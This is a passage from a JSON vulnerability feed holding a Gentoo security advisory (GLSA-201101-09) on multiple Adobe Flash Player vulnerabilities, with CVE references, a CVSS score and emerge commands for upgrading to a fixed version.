"CVE-2010-3649", "CVE-2010-2178"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Flash Player. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. 
\n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-10.1.102.64\"", "modified": "2011-01-21T00:00:00", "published": "2011-01-21T00:00:00", "id": "GLSA-201101-09", "href": "https://security.gentoo.org/glsa/201101-09", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}